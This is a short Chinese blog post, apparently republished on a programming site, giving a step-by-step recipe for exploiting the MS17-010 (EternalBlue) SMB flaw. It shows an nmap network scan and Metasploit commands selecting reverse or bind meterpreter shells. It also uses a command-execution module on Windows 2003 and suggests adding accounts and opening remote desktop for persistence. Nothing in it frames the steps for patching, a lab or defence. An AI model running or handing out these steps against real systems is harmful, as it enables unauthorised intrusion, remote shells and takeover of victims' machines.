1. 全栈程序员必看首页

MS17010漏洞利用姿势

全栈程序员-站长 未分类 阅读 501

MS17010漏洞利用姿势MSF在msf中常规的17-010打法如下扫描是否存在ms17-010漏洞:nmap-n-p445–scriptsmb-vuln-ms17-010192.168.1.0/24–openMSF常规漏洞利用msf>useexploit/windows/smb/ms17_010_eternalbluemsf>setrhost192.168.1.112目标出网时反向打:msf>setpayloadwindows/x64/met..

大家好,又见面了,我是你们的朋友全栈君。

MSF

在msf中常规的17-010打法如下

扫描是否存在ms17-010漏洞,扫描方式很多如namp或者fscan或msf等

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

MSF常规漏洞利用

msf > use exploit/windows/smb/ms17_010_eternalblue 

目标出网时反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 

目标不出网时正向打(如添加了路由):
msf > set payload windows/x64/meterpreter/bind_tcp

目标为win2003

当目标为win2003时可能,虽然目标机器存在漏洞,但是可能会返回不了session

MS17010漏洞利用姿势

换一个打发,直接执行系统命令

msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

 MS17010漏洞利用姿势

 既然可以执行命令那就好办了~~可以添加账号、开启3389

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/130623.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • mysql存储引擎

    mysql存储引擎

    mysql存储引擎mysql存储引擎

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月24日
    35
  • 让人“眼前一亮、不明觉厉”的互联网技术PPT「建议收藏」

    让人“眼前一亮、不明觉厉”的互联网技术PPT「建议收藏」

    让人“眼前一亮、不明觉厉”的互联网技术PPT「建议收藏」为什么选择分享一起如此“鸡肋”的博文呢?我一直有个习惯:理论和实践,两手抓两手也要硬,最近一直搞技术,手里很多的新技术资料还未来得及消化,遂学习总结,加以分享。在做互联网产品功能介绍、互联网产品技术路线、技术人年度总结、互联网教育培训、互联网技术宣讲、技术人毕业答辩等场合时,可以参照以下PPT,让你思如泉涌,格调升级,瞬间征服观众~

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月1日
    44
  • 迭代和递归的理解和区别

    迭代和递归的理解和区别

    迭代和递归的理解和区别最近做一些题经常会碰到迭代的方法解的,或者递归解法,容易搞混,特在此整理一下一.递归:由例子引出,先看看递归的经典案例都有哪些1.斐波那契数列斐波纳契数列,又称黄金分割数列,指的是这样一个数列:1、1、2、3、5、8、13、21、……这个数列从第三项开始,每一项都等于前两项之和。2.阶乘n!=n*(n-1)*(n-2)*…*1(n>0)3.汉诺塔问…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月3日
    37
  • MATLAB——axis

    MATLAB——axis

    MATLAB——axisaxis中文为“轴”之意,在matlab中用于控制坐标轴的范围和样式(颜色等)。axis([XMINXMAXYMINYMAX])设置当前所绘图像的x轴和y轴的范围。axis([XMINXMAXYMINYMAXZMINZMAX])设置当前所绘图像的x轴、y轴和z轴的范围。例子:>>x=[1,2,3,4,5];>>y=[2,3,4,5,6];

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月10日
    55
  • spring整合spring-data-redis和spring-session-data-redis通过shiro实现单点登录

    spring整合spring-data-redis和spring-session-data-redis通过shiro实现单点登录

    spring整合spring-data-redis和spring-session-data-redis通过shiro实现单点登录运行效果图缓存说明(本项目没有使用shiro的缓存管理器和session管理器)shiro_user_cache:permission:权限缓存,当前只有test用户shiro_user_cache:role:角色缓存,当前只有test用户shiro_user_kickout:保存被踢出的用户shiro_user_online:保存登录了的用户sprting:spr

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月3日
    101
  • volatile为什么不能保证原子性

    volatile为什么不能保证原子性

    volatile为什么不能保证原子性首先要了解的是,volatile可以保证可见性和顺序性,这些都很好理解,那么它为什么不能保证原子性呢?可见性可见性与Java的内存模型有关,模型采用缓存与主存的方式对变量进行操作,也就是说,每个线程都有自己的缓存空间,对变量的操作都是在缓存中进行的,之后再将修改后的值返回到主存中,这就带来了问题,有可能一个线程在将共享变量修改后,还没有来的及将缓存中的变量返回给主存中,另外一个线程就对…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月27日
    11

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号